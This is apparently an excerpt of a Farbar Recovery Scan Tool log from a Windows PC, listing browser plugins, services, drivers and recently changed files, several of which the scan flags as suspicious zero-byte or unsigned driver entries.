FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
